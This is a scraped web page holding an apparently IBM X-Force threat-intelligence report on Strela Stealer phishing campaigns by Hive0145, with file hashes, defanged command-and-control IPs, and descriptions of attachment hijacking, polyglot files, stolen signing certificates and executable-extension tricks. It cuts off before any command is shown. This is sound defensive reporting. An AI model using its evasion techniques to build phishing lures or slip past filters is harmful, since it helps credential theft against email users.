font-family: Calibri, sans-serif;"><b><span style="color: black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">03853c56bcfdf87d71ba4e17c4f6b55f989edb29fc1db2c82de3d50be99d7311</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Oct 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e50bea80513116a1988822fe02538d3af4d91505d4098afca4ea741bcf4cd427</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (May 2024)</p> </td> </tr> <tr> <td 
style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2cac42735170cd3f67111807a7e48f8fca104eb97c379129872249160d90e22d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader - minimal obfuscation (Jan 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">9a032497b82c3db8146cb624b369f63bef76b302a5e25349156bdcb53af3fb84</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" 
valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">e4a7ad38aaea4bd27c32c57b5a52eac1020495cf8698a2b595b169a3c5c9313a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer payload</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">2f7ac330e100b577748bb34bd8f7f655f6d138b90683594dbf06ccc41bb3751a</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Stellar Loader (Nov 2024)</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, 
sans-serif;">94.159.113[.]48</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">94.159.113[.]86</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #161616;">193.109.85[.]231</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 
1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer C2</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">5906c8e683b8eb9d2bc104f3ca7abaa1f76c64ac694c46a0de5ec67456364f5d</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">SHA256</p> </td> <td style="width: 201.55pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Strela Stealer .NET variant</p> </td> </tr> </tbody> </table>" } </script> <!-- BREADCRUMB SCHEMA --> <script id="post-schema" type="application/ld+json"> { "@context": "https://schema.org", "@type": "BreadcrumbList", "itemListElement": [ { "@type": "ListItem", "position": 1, "name": "Home", "item": "https://securityintelligence.com/" }, ] } </script> <div id="progressbar"> <amp-animation id="progress-animation" layout="nodisplay"> <script type="application/json"> { "duration": "1s", "iterations": "1", "fill": "both", "direction": "alternate", "animations": [{ "selector": "#progressbar", "keyframes": [{ 
"transform": "translateX(0)" }] }] } </script> </amp-animation> </div> <amp-position-observer target="post__content" intersection-ratios="0" viewport-margins="25vh 75vh" on="scroll:progress-animation.seekTo(percent=event.percent)" layout="nodisplay"></amp-position-observer> <div class="dark_background" style="background:black;"></div> <div class="container grid" style="background:black;"> <!-- Breadcrumbs --> <aside class="breadcrumbs "> <h1 class="breadcrumbs__page_title">Strela Stealer: Today’s invoice is tomorrow’s phish</h1> </aside> </div> <div class="container grid hero_background "> <div class="grid__content post "> <div class="post__thumbnail"> <amp-img alt="closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols" width="1200" height="630" layout="responsive" src="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp" srcset="/wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-300x158.jpeg.webp 300w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg.webp 630w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp 1200w, /wp-content/webp-express/webp-images/doc-root/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg.webp 2400w"> <amp-img fallback alt="closeup on a digital screen with a red envelope & the word phishing in yellow & 2 yellow warning symbols" width="1200" height="630" layout="responsive" src="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg" srcset="https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-300x158.jpeg 300w, 
https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments-630x330.jpeg 630w, https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg 1200w, https://securityintelligence.com/wp-content/uploads/2024/11/Phishing.-financial-concept.-Digital-payments.jpeg 2400w"> </amp-img> </amp-img> </div> <div class="new_categoy"> <div class="category-container"> <div class="category"> <div class="theme"> <div class="form-check form-switch"> <div class="link-container"> <a href="#" class="theme-link" id="light-theme-link">Light</a> <a href="#" class="theme-link" id="dark-theme-link">Dark</a> </div> </div> </div> <hr class="separator"> <div class="author_date"> <div class="information"> <span class="date">November 12, 2024</span> <span class="author_category">By <a href="https://securityintelligence.com/author/golo-muhr/" >Golo Mühr</a> <span class="author_comma"></span><br> <!--== Co-Authors ==--> <!-- <br /> --> <a href="https://securityintelligence.com/author/joe-fasulo/">Joe Fasulo</a> <span class="author_comma"></span><br> <a href="https://securityintelligence.com/author/charlotte-hammond/">Charlotte Hammond</a> <br> </span> <span class="author_category"><span class="span-reading-time rt-reading-time"><span class="rt-label rt-prefix"></span> <span class="rt-time"> 12</span> <span class="rt-label rt-postfix">min read</span></span></span> </div> </div> <hr class="separator"> <div class="title"> <a href="https://securityintelligence.com/category/x-force/threat-intelligence/"><span class="name_category">Threat Intelligence<br> <a href="https://securityintelligence.com/category/x-force/malware-threat/"><span class="name_other_category">Malware<br> <a href="https://securityintelligence.com/category/x-force/"><span class="name_other_category">X-Force<br> </span></a> </div> <div class="social-container" style="visibility: hidden;"> <hr class="separator"> <div class="social"> <!-- Social 
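ICONS --> <a href="https://twitter.com/intent/tweet?text=Strela Stealer: Today’s invoice is tomorrow’s phish&url=https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/twitter.svg" alt="twitter"></amp-img></a> <a href="https://www.linkedin.com/shareArticle?url=https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/linkedin.svg" alt="Linkedin" ></amp-img></a> <a href="https://www.facebook.com/sharer/sharer.php?u=https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/facebook.svg" alt="facebook"></amp-img></a> <a href="https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/" target="_blank" rel="noopener noreferrer"><amp-img class="arrow" layout="fixed" height="26" width="26" src="https://securityintelligence.com/wp-content/themes/sapphire/images/social-icons/link.svg" alt="An arrow pointing up"></amp-img></a> </div> </div> </div>
<script>
// Theme handling for the post header. Each statement is kept on its own line:
// in the flattened source every `//` comment swallowed the code that followed
// it on the same line.

// Pin the category bar once the reader has scrolled away from the top.
// scrollY is never negative, so the original `>= 0` test was always true and
// the `sticky` class could never be removed again; `> 0` restores the toggle.
window.addEventListener('scroll', function () {
  var category = document.querySelector('.category');
  if (!category) {
    return; // template without a category bar: nothing to pin
  }
  if (window.scrollY > 0) {
    category.classList.add('sticky');
  } else {
    category.classList.remove('sticky');
  }
});

// X-Force posts are always shown in the dark theme and never persist a preference.
// Match on the path only: location.href also carries the query string and
// fragment, so any page reached via a "?ref=/x-force/"-style URL would otherwise
// be forced dark and stop saving the reader's choice.
const isXForcePost = location.pathname.includes("/x-force/");

// Function to set the light theme. `toSaveLocalStorage` is false when the theme
// is applied programmatically at load time for an X-Force post.
function setLightTheme(event, toSaveLocalStorage = true) {
  event.preventDefault();
  document.body.classList.remove('dark-theme');
  // Save the user's theme preference in localStorage
  // (setSiTheme is defined elsewhere on the page — not visible here)
  if (toSaveLocalStorage && !isXForcePost) {
    setSiTheme('light');
  }
}

// Function to set the dark theme; mirrors setLightTheme.
function setDarkTheme(event, toSaveLocalStorage = true) {
  event.preventDefault();
  document.body.classList.add('dark-theme');
  // Save the user's theme preference in localStorage
  if (toSaveLocalStorage && !isXForcePost) {
    setSiTheme('dark');
  }
}

// Add click event listeners to the theme links. Guarded so a missing link does
// not throw and skip the initial theme selection below.
const lightThemeLink = document.getElementById('light-theme-link');
const darkThemeLink = document.getElementById('dark-theme-link');
if (lightThemeLink) {
  lightThemeLink.addEventListener('click', (event) => setLightTheme(event));
}
if (darkThemeLink) {
  darkThemeLink.addEventListener('click', (event) => setDarkTheme(event));
}

// Check localStorage to set the initial theme preference
const themePreference = localStorage.getItem('si-theme-mode');

// Function to simulate a click event so the handlers above run at load time
function simulateClick(handler, toSaveLocalStorage) {
  const event = new Event('click');
  handler(event, toSaveLocalStorage);
}

// Apply the correct theme based on URL and preference
if (isXForcePost) {
  simulateClick(setDarkTheme, false); // Apply the dark theme for all x-force posts
} else if (themePreference === 'dark') {
  simulateClick(setDarkTheme, true); // Apply the dark theme based on user preference
} else {
  simulateClick(setLightTheme, true); // Apply the light theme by default (covers 'light' and unset)
}
</script>
<script>
// Share buttons stay hidden until the stored consent record permits them.
// localStorage is writable by any script on this origin, so the value is
// treated as untrusted: a malformed entry must not throw and abort the script.
let cookies = null;
try {
  cookies = JSON.parse(localStorage.getItem("truste.eu.cookie.notice_preferences"));
} catch (e) {
  cookies = null;
}
const socialContainer = document.querySelector('.social-container');
// '2:' is presumably the consent level that allows the share widgets — confirm against the consent configuration
if (socialContainer && cookies && cookies.value === '2:') {
  socialContainer.style.visibility = 'visible';
}
</script>
</div> <main class="post__content post__content--continue_reading" id="post__content"> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html><body><p>As of November 2024, IBM X-Force has tracked 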
ongoing Hive0145 campaigns delivering <i>Strela Stealer</i> malware to victims throughout Europe – primarily Spain, Germany and Ukraine. The phishing emails used in these campaigns are real invoice notifications, which have been stolen through previously exfiltrated email credentials. Strela Stealer is designed to extract user credentials stored in Microsoft Outlook and Mozilla Thunderbird. During the past 18 months, the group tested various techniques to enhance its operation’s effectiveness. Hive0145 is likely to be a financially motivated initial access broker (IAB), active since late 2022 and potentially the sole operator of Strela Stealer. The continuous operational pace of Hive0145’s campaigns highlights an increased risk to potential victims across Europe.</p> <h2>Key Findings:</h2> <ul type="disc"> <li>Hive0145 is an initial access broker focused on targeting victims throughout Europe</li> <li>During the last 18 months, Strela Stealer has tested out a variety of techniques to improve its infection chain and extract email credentials</li> <li>As of July 2024, Hive0145 began using stolen emails to further spread Strela Stealer</li> <li>Hive0145 campaigns have increased in volume, with weekly campaigns as of 17 October 2024</li> <li>As of early November 2024, Hive0145 began targeting Ukraine with stolen invoice emails</li> <li>Hive0145 is potentially the sole operator of Strela Stealer</li> </ul> <h2>Background</h2> <p>Starting mid-April 2023, X-Force began tracking an increase in Hive0145 activity. Hive0145 is likely a financially motivated initial access broker (IAB) and potentially the sole operator of Strela Stealer. Strela Stealer is a <a href="https://www.ibm.com/topics/malware" target="_blank" rel="noopener nofollow" >malware</a> designed to extract user email credentials stored in Microsoft Outlook and Mozilla Thunderbird, potentially leading to Business Email Compromise (BEC). 
IABs routinely gather credentials and other data that is sold to affiliate <a href="https://www.ibm.com/topics/threat-actor" target="_blank" rel="noopener nofollow" >threat actors</a> specializing in victim network exploitation. However, it remains unknown if Hive0145 has a specific partner network for selling the access gained through their campaigns.</p> <p>Over the past year, Hive0145 has demonstrated proficiency in evolving tactics, techniques and procedures (TTPs) to target victims across Europe. Italian, Spanish, German and Ukrainian victims continue to receive weaponized attachments that entice the victim to open the file. The actor’s campaigns present the victim with fake invoices or receipts and often a short, generic message of urgency for victims to address. Upon loading the attached file, the victim unwittingly executes the infection chain leading to Strela Stealer malware.</p> <p><strong><amp-img src="https://images2.cmp.optimizely.com/Zz1iODZmNTg3OGEwN2ExMWVmYWNmNDY2OGUwNDMwMWU2OQ==" layout="intrinsic" class="" alt="fig 1-strela_santander.png" width="547.8264947245018" height="544" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 1 Banco Santander-themed email campaign</em></p> <p>Hive0145 continued this pattern of using generic messages and fake invoices and receipts throughout the first half of 2024. However, by early July 2024, the group adopted a different approach and began weaponizing stolen emails of actual entities across financial, technology, manufacturing, media, e-commerce and other industries. The departure in simplicity indicates Hive0145’s shift in a maturing cyber operations capability.</p> <h2>Attachment hijacking</h2> <p>In July 2024, X-Force observed a mid-campaign change in the emails being distributed by Hive0145, with the short and generic messages being replaced with what appeared to be legitimate stolen emails. 
The <a href="https://www.ibm.com/topics/phishing" target="_blank" rel="noopener nofollow" >phishing</a> emails exactly matched official invoice communication emails and, in some cases, still directly addressed the original recipients by name. X-Force was able to verify that the emails were in fact authentic invoice notifications from a variety of entities across financial, technology, manufacturing, media, e-commerce and other industries. It is likely that the group sourced the emails through previously exfiltrated credentials from their prior campaigns.</p> <p>The concept of using stolen emails is not new, it was used extensively by the Emotet group and malware distributors such as Hive0118 (aka TA577), <a href="https://www.proofpoint.com/us/blog/security-briefs/ta551-uses-sliver-red-team-tool-new-activity" target="_blank" rel="noopener nofollow" >TA551</a> and <a href="https://www.proofpoint.com/sites/default/files/misc/pfpt-us-threat-research-2023-05-12-cybercrime-experimentation.pdf" target="_blank" rel="noopener nofollow" >TA570</a>. In their campaigns, they leveraged thread hijacking, where new threads to stolen emails were used as a way to increase the appearance of legitimacy. The modified emails were sent to corresponding contacts of previous victims, making the final email look like a reply to the stolen email, thereby hijacking the email thread. The text the distributors add to the emails is often short replies, urging victims to look at the included attachments or URLs.</p> <p>The technique employed by Hive0145 differs from thread-hijacking in that rather than adding a reply message to the stolen email, the original contents remain largely unmodified and only the attachment is switched to include a malicious payload using the original filename (without the original extension). Within the email body, Hive0145 also replaces both the local part and the domain of the original email sender with that of the new phishing victim to custom-tailor the email. 
The emails with hijacked attachments are then sent out in mass phishing campaigns. Hive0145 also appears to carefully consider the hijacked emails by only selecting ones referring to invoices and containing attachments. X-Force has observed the attachment hijacking technique since mid-2024 in campaigns targeting German, Spanish and Ukrainian speakers.</p> <p><strong><amp-img src="https://images1.cmp.optimizely.com/Zz1jYTBkYzQwMmEwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" layout="intrinsic" class="" alt="fig 2-image-2024-11-5_16-42-6.png" width="544" height="615.3951497860199" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 2 Example of original stolen email of a Deutsche Bahn invoice with hijacked attachment</em></p> <h2>Late 2024 campaign</h2> <p>The July 2024 campaign began to reveal low volumes of email delivery throughout the week of 8 July. Hive0145 appeared to take a short break before returning with a larger campaign the week of 22 July, followed by a period of inactivity. Starting mid-October 2024, Hive0145 returned with a widespread attachment hijacking campaign targeting Spanish, German and Ukrainian victims. Unlike the brief July campaign, this one has continued sending out notable volumes of emails with the majority sent during weekdays.</p> <p><amp-img src="https://images1.cmp.optimizely.com/Zz1kNWYyZTYxY2EwN2ExMWVmYmM1YzI2ZmFmZTE3ZDc1MA==" layout="intrinsic" class="" alt="fig 3-image copy.png" width="672" height="112" lightbox="lightbox"></amp-img></p> <p><em>Figure 3 The ongoing late-October 2024 campaign</em></p> <p>Emails stolen across financial, technology, manufacturing, media, e-commerce and other industries continue to be weaponized as of early November 2024, in one of the largest observed Hive0145 campaigns to date. In the ongoing campaign, the victim receives an archive containing a heavily obfuscated JavaScript file that downloads and executes a crypted Strela Stealer DLL. 
As of 7 November 2024, Hive0145 is including Ukrainian speakers in the ongoing campaign signaling a significant development compared to previously observed victimology.</p> <p><strong><amp-img src="https://images3.cmp.optimizely.com/Zz1mYWMzNGEyY2EwN2ExMWVmYTdmYTllMDI5N2MwOTY3Mg==" layout="intrinsic" class="" alt="fig 4-Screenshot 2024-11-11 at 08.59.58.png" width="544" height="616.068376068376" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 4 Example of the original stolen email of an invoice targeting Ukraine</em></p> <p>Hive0145’s increased volume of delivery using attachment hijacking with a steady supply of freshly stolen emails may suggest the group has adopted automation for harvesting, weaponizing, packaging and sending their phishing emails. The group continues to show a preference for widespread exploitation of Spanish, German and Ukrainian victims throughout Europe.</p> <h2>Evolving techniques</h2> <p>Hive0145 stands out among other malware distributors for their level of effort to adopt increasingly sophisticated methods of delivering Strela Stealer. The level of sophistication reflects on other successful mass distributors of malware such as Emotet, Pikabot and Qakbot, which often led to the deployment of <a href="https://www.ibm.com/topics/ransomware" target="_blank" rel="noopener nofollow" >ransomware</a>. Below is a breakdown of notable techniques used by Hive0145 over time, with some being briefly tested and others fully adopted.</p> <h3>Polyglots</h3> <p>The first Strela Stealer campaigns observed by X-Force made use of polyglot files, as first reported in a <a href="https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc" target="_blank" rel="noopener nofollow" >blog by DCSO (Deutsche Cyber-Sicherheitsorganisation)</a> in late 2022. These files have multiple valid formats and can be parsed by different applications. 
The same file could be rendered as both HTML to display a decoy invoice as well as be a valid DLL, implementing Strela Stealer. This is a rather uncommon technique for attempting to bypass security solutions.</p> <h3>Signed binaries</h3> <p>Multiple campaigns throughout 2023 made use of valid code signing certificates for the malicious Strela Stealer binaries. For example, campaigns targeting Spanish-speaking victims dating back to April 2023 contained payloads with a valid certificate signed by <b>Tecfinance Informatica E Projetos De Sistemas Ltda</b>, a software company in Brazil.</p> <p><strong><amp-img src="https://images4.cmp.optimizely.com/Zz0wZTc0Y2ViYWEwN2IxMWVmYWUxOTJhOGIzMTc4OTEwMw==" layout="intrinsic" class="" alt="fig 5-image.png" width="573" height="455" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 5 Brazilian company certificate used in 2023 campaigns</em></p> <p>On 5 May 2024, X-Force took steps to inform relevant parties of the finding, and the certificate has since been revoked.</p> <p>Of note, a mid-2023 Italy-targeted campaign used a different certificate:</p> <p><strong><amp-img src="https://images1.cmp.optimizely.com/Zz0xYjA0NGNiZWEwN2IxMWVmOGEzYzJhYzI5NDg3NjE0MA==" layout="intrinsic" class="" alt="fig 6-Screenshot 2023-05-15 at 12.58.52.png" width="341" height="372" lightbox="lightbox"></amp-img></strong></p> <p><em>Figure 6 Another stolen certificate used in mid-2023 to target Italian victims</em></p> <h2>Targeted phishing</h2> <p>Strela Stealer phishing campaigns also tailored filenames to include targeted domain names. The file names are often identical to the name of the organization or company, potentially in an attempt to generate authenticity. 
The example below is a phishing email from 2023 posing as an invoice or payment receipt.</p> <p><amp-img src="https://images3.cmp.optimizely.com/Zz0yOWJhYjYzMGEwN2IxMWVmYTVjZWU2NTBmNjQyY2Y2Ng==" layout="intrinsic" class="" alt="fig 7-strela_factura.png" width="547.8354876615747" height="544" lightbox="lightbox"></amp-img></p> <p><em>Figure 7 Factura-themed email campaign</em></p> <p>As the email suggests, the attachments are encrypted ZIP files, with passwords that differ slightly from one email to the next. Threat actors encrypt email attachments since basic email filtering and sandbox solutions often cannot inspect or detonate those files.</p> <p>Strela Stealer has also used uncommon extensions for their PE executable files such as <b>.com</b> instead of <b>.exe</b>:</p> <table class="ScrollCode" style="border: 1pt dashed #6199c9; width: 88.5174%;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 100%; border: none; padding: 8.65pt 5pt 12.95pt 2.9pt;" valign="top"> <div style="border: none; border-left: none windowtext 1.0pt; padding: 0in 0in 0in 12.0pt; margin-left: 12.0pt; margin-right: 0in;"> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">transferencia_&lt;domain_name&gt;.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier New';">factura_&lt;domain_name&gt;.com</span></span></p> <p style="margin: 0in; line-height: 107%; break-after: avoid; border: none; padding: 0in; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: black;"><span style="font-size: 9.0pt; line-height: 107%; font-family: 'Courier 
New';">FATTURA_&lt;domain_name&gt;.bat.exe</span></span></p> </div> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> <p>This takes advantage of the fact that Microsoft Windows operating systems treat three different extensions as marking a file as executable: <b>.exe, .com, </b>and<b> .pif.</b></p> <p>If the content is an executable PE file, Microsoft Windows will run it automatically once opened. By using the less common and less familiar extensions, the campaign may evade simple anti-virus solutions or avoid raising victim suspicion. Earlier campaigns with the same payloads were also observed to make use of the <b>.pif</b> extension.</p> <h2>Packing, obfuscation and crypting</h2> <p>Apart from directly attached ZIP archives with the malicious executables, Strela Stealer campaigns also often use obfuscated scripts such as Batch, JavaScript or PowerShell to download or drop their payload.</p> <p>Campaigns throughout 2024 mainly relied on these obfuscated scripts to run a PowerShell command to connect to a WebDAV server and download and execute a crypted DLL:</p> <table class="ScrollCode" style="border: dashed #6199C9 1.0pt;" border="1" cellspacing="0" cellpadding="0"> <tbody> <tr> <td style="width: 447.3pt; border: none; padding: 8.65pt 5.0pt 12.95pt 